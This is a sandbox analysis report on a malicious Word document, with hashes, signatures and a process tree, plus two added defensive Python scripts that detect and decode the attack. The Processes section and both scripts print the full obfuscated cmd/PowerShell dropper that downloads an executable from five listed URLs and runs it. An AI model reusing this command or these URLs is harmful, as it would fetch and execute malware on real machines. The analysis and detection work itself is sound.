Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted
    17-06-2024 19:41

General

  • Target

    b9b0bfe962149e50c52b24cec1275534_JaffaCakes118.doc

  • Size

    217KB

  • MD5

    b9b0bfe962149e50c52b24cec1275534

  • SHA1

    c7b3026099820fd57e7ca7c74944ac22d39e4054

  • SHA256

    c95d7e6efb2ec61100dba574e1a359927e9726efdad76b4c809b93ef12a06f73

  • SHA512

    702a55479507ef63758ee61b132e0cb913188913cf2bbdba20c41fdd967412ec54de83de4983540a9d7a2e58990d73d2496a4a5eac5e0fbc9b5943ec32f11a6b

  • SSDEEP

    3072:SinJXfT7nasKiNKDzaJFUKc0UTE7yZRUV7RJeOzi80:5JXr7nbpEDzYUTE7yZRVUi80

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
    yes
  • URLs (all tagged exe.dropper; the script tries each in turn and stops at the first download of at least 80000 bytes)

    http://mimiabner.com/22D_ZGrV5aY_AvvRf

    http://nt-group.kz/86Rzn_wmF7RyQ7F

    http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ

    http://tasmatbaa.com/1MXeJC9_KSsQ7B

    http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro. Here WINWORD.EXE (PID 1916) spawns cmd.exe (PID 2572), which in turn launches powershell.exe (PID 2592); a word processor has no legitimate reason to start a command interpreter.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
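The check behind the "Process spawned unexpected child process" signature is a parent-child rule over process-creation events. The script below is an added example, not code from the sandbox or its report: it runs that rule over a constructed event set whose PIDs, images and (truncated) command lines are copied from the process tree in this report, and also marks command lines that use the cmd.exe `%VAR:~start,len%` substring trick. splwow64.exe, the 32-bit print driver host that Word starts on its own, is a normal child and must not fire; the list of Office and interpreter image names is an assumption, not something the page states.

```python
"""Flag the WINWORD -> cmd.exe -> powershell.exe chain from process events.

Added example, not part of the sandbox report. It reimplements, over a
constructed set of process-creation events copied from the report's
process tree, the check behind the "Process spawned unexpected child
process" signature: an Office application, directly or through an
intermediate shell, ends up running a command interpreter.
"""
import ntpath
import re

# Assumed image-name sets (not from the page).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# cmd.exe %VAR:~start,len% substring expansion, used here to hide "powershell".
SUBSTRING_OBFUSCATION = re.compile(r"%\w+:~-?\d+(?:,-?\d+)?%")

# Constructed events mirroring the PIDs, images and command lines in the
# report (command lines truncated to the part the check needs).
EVENTS = [
    {"pid": 1916, "ppid": 0,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b9b0bfe962149e50c52b24cec1275534_JaffaCakes118.doc"'},
    {"pid": 2572, "ppid": 1916,
     "image": r"c:\windows\SysWOW64\cmd.exe",
     "cmdline": r"c:\Responsec47\Integrationo30\withdrawaliu95\..\..\..\windows\system32\cmd.exe /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Berkshirej45='Crescentt4';..."},
    {"pid": 2592, "ppid": 2572,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell $Berkshirej45='Crescentt4';$CreditCardAccounti50=new-object Net.WebClient;..."},
    {"pid": 2824, "ppid": 1916,
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": r"C:\Windows\splwow64.exe 12288"},
]


def ancestry(pid, by_pid):
    """Return the chain of PIDs from the root ancestor down to `pid`."""
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def find_office_spawned_interpreters(events):
    """Return one alert per interpreter that has an Office app as an ancestor."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = ntpath.basename(e["image"]).lower()
        if image not in INTERPRETERS:
            continue
        chain = ancestry(e["pid"], by_pid)
        office_roots = [p for p in chain[:-1]
                        if ntpath.basename(by_pid[p]["image"]).lower() in OFFICE_APPS]
        if not office_roots:
            continue
        alerts.append({
            "pid": e["pid"],
            "image": image,
            "chain": chain,                     # e.g. [1916, 2572, 2592]
            "obfuscated_cmdline": bool(SUBSTRING_OBFUSCATION.search(e["cmdline"])),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_office_spawned_interpreters(EVENTS):
        print(alert)
```

Walking the full ancestry rather than only the direct parent matters here: powershell.exe's direct parent is cmd.exe, which on its own is unremarkable; it is the WINWORD.EXE root that makes the chain suspicious.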

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b9b0bfe962149e50c52b24cec1275534_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1916
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\Responsec47\Integrationo30\withdrawaliu95\..\..\..\windows\system32\cmd.exe /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Berkshirej45='Crescentt4';$CreditCardAccounti50=new-object Net.WebClient;$Granitez64='http://mimiabner.com/22D_ZGrV5aY_AvvRf@http://nt-group.kz/86Rzn_wmF7RyQ7F@http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ@http://tasmatbaa.com/1MXeJC9_KSsQ7B@http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6'.Split('@');$Granitez70='Trafficwaywb73';$Cambridgeshireik76 = '204';$Ridgesj14='Implementedph58';$Officerkc37=$env:public+'\'+$Cambridgeshireik76+'.exe';foreach($JBODfj17 in $Granitez64){try{$CreditCardAccounti50.DownloadFile($JBODfj17, $Officerkc37);$CreditCardAccountmq39='ShoesShoesd41';If ((Get-Item $Officerkc37).length -ge 80000) {Invoke-Item $Officerkc37;$FTPbj82='Portjf32';break;}}catch{}}$calculatejh80='Valleysik6';
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2572
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $Berkshirej45='Crescentt4';$CreditCardAccounti50=new-object Net.WebClient;$Granitez64='http://mimiabner.com/22D_ZGrV5aY_AvvRf@http://nt-group.kz/86Rzn_wmF7RyQ7F@http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ@http://tasmatbaa.com/1MXeJC9_KSsQ7B@http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6'.Split('@');$Granitez70='Trafficwaywb73';$Cambridgeshireik76 = '204';$Ridgesj14='Implementedph58';$Officerkc37=$env:public+'\'+$Cambridgeshireik76+'.exe';foreach($JBODfj17 in $Granitez64){try{$CreditCardAccounti50.DownloadFile($JBODfj17, $Officerkc37);$CreditCardAccountmq39='ShoesShoesd41';If ((Get-Item $Officerkc37).length -ge 80000) {Invoke-Item $Officerkc37;$FTPbj82='Portjf32';break;}}catch{}}$calculatejh80='Valleysik6';
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2592
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2824
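Two tricks in the cmd.exe command line above are worth decoding by hand rather than by running it: the executable path is padded with three junk directories that `..\..\..` cancels out, and the word "powershell" is assembled from `%VAR:~start,len%` substrings of environment variables so it never appears literally. The script below is an added example, not code from the sandbox or the report: it resolves both tricks and then pulls the payload URLs, drop path and size threshold out of the PowerShell one-liner with string parsing only, never executing it. The environment values (PUBLIC, SESSIONNAME, TEMP) are assumed typical Windows 7 values for the report's "Admin" user, not values the page states.

```python
"""Decode the cmd.exe / PowerShell downloader command line from this report.

Added example, not part of the sandbox report. Resolves the cmd.exe
%VAR:~start,len% substring trick and the ..\..\.. path padding, then
extracts IoCs from the PowerShell body by parsing it (no execution).
"""
import ntpath
import re

# Constructed environment: assumed Windows 7 defaults for user "Admin".
ASSUMED_ENV = {
    "PUBLIC": r"C:\Users\Public",
    "SESSIONNAME": "Console",
    "TEMP": r"C:\Users\Admin\AppData\Local\Temp",
}

# The cmd.exe command line as logged in the report.
CMD_LINE = (
    r"c:\Responsec47\Integrationo30\withdrawaliu95\..\..\..\windows\system32\cmd.exe /c "
    "pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll "
    "$Berkshirej45='Crescentt4';$CreditCardAccounti50=new-object Net.WebClient;"
    "$Granitez64='http://mimiabner.com/22D_ZGrV5aY_AvvRf@http://nt-group.kz/86Rzn_wmF7RyQ7F@"
    "http://hartarizkigraha.co.id/wp-admin/JF0bdEb_lnQt6dKQ@http://tasmatbaa.com/1MXeJC9_KSsQ7B@"
    "http://trend-studio.art/k6jaCgS_Ukfd_apNei38I6'.Split('@');"
    "$Granitez70='Trafficwaywb73';$Cambridgeshireik76 = '204';$Ridgesj14='Implementedph58';"
    "$Officerkc37=$env:public+'\\'+$Cambridgeshireik76+'.exe';"
    "foreach($JBODfj17 in $Granitez64){try{$CreditCardAccounti50.DownloadFile($JBODfj17, $Officerkc37);"
    "$CreditCardAccountmq39='ShoesShoesd41';If ((Get-Item $Officerkc37).length -ge 80000) "
    "{Invoke-Item $Officerkc37;$FTPbj82='Portjf32';break;}}catch{}}$calculatejh80='Valleysik6';"
)

_SUBSTR = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*):~(-?\d+)(?:,(-?\d+))?%")


def expand_cmd_substrings(text, env):
    """Expand cmd.exe %VAR:~start[,len]% references.

    Mirrors cmd.exe semantics: a negative start counts back from the end of
    the value, a negative length drops that many characters from the end.
    """
    def repl(m):
        name, start, length = m.group(1), int(m.group(2)), m.group(3)
        value = env.get(name.upper(), "")
        if start < 0:
            start = max(len(value) + start, 0)
        if length is None:
            end = len(value)
        elif int(length) < 0:
            end = len(value) + int(length)
        else:
            end = start + int(length)
        return value[start:end]
    return _SUBSTR.sub(repl, text)


def decode_command(cmd_line, env=ASSUMED_ENV):
    """Return the IoCs an analyst wants from the logged command line."""
    expanded = expand_cmd_substrings(cmd_line, env)
    binary, _, rest = expanded.partition(" /c ")
    launcher, ps_script = rest.split(" ", 1)   # first word is what cmd.exe runs
    # String literals assigned to variables, e.g. $Cambridgeshireik76 = '204'
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", ps_script))
    urls_blob = re.search(r"'(http[^']*)'\.Split\('@'\)", ps_script).group(1)
    # Drop path is built as $env:public + '\' + $<var> + '.exe'
    m = re.search(r"\$env:public\+'\\'\+\$(\w+)\+'\.exe'", ps_script)
    drop_path = env["PUBLIC"] + "\\" + literals[m.group(1)] + ".exe"
    min_size = int(re.search(r"\.length -ge (\d+)", ps_script).group(1))
    return {
        "cmd_path": ntpath.normpath(binary),   # collapses the ..\..\.. padding
        "launcher": launcher,                  # "powershell" once expanded
        "urls": urls_blob.split("@"),
        "drop_path": drop_path,
        "min_size": min_size,
    }


if __name__ == "__main__":
    for key, value in decode_command(CMD_LINE).items():
        print(f"{key}: {value}")
```

The 80000-byte check is why the report lists five URLs but only one `exe.dropper` payload per run: the loop downloads from each host in order and invokes the first file that is large enough, so a dead or sinkholed first host just moves execution to the next one.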

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      3edab193af27fef69b1ca5f242ae711c

      SHA1

      3a1050883e35e1f21f5ceff14f069c6bbbbb5863

      SHA256

      a299502c7aafe9a2e36f70e2aaa2570083491fc7da1f83e7156d485b761581f2

      SHA512

      b88f3f69fdc70b34cb0970cff0bf1abdc66cd128b58bb5460e1e1b0c23c645830076933325ffe4f98bdb2d98e174ad2af2c7f8bbe59c8ea8fde38a2be949ac9c

    • memory/1916-24-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1916-11-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-8-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-9-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-37-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-32-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-38-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-31-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-26-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-76-0x00000000718CD000-0x00000000718D8000-memory.dmp

      Filesize

      44KB

    • memory/1916-2-0x00000000718CD000-0x00000000718D8000-memory.dmp

      Filesize

      44KB

    • memory/1916-13-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-18-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-23-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-12-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-10-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-25-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-75-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1916-53-0x00000000718CD000-0x00000000718D8000-memory.dmp

      Filesize

      44KB

    • memory/1916-54-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/1916-0-0x000000002FFB1000-0x000000002FFB2000-memory.dmp

      Filesize

      4KB

    • memory/2592-50-0x0000000005000000-0x0000000005052000-memory.dmp

      Filesize

      328KB

    • memory/2592-51-0x0000000004F80000-0x0000000004F95000-memory.dmp

      Filesize

      84KB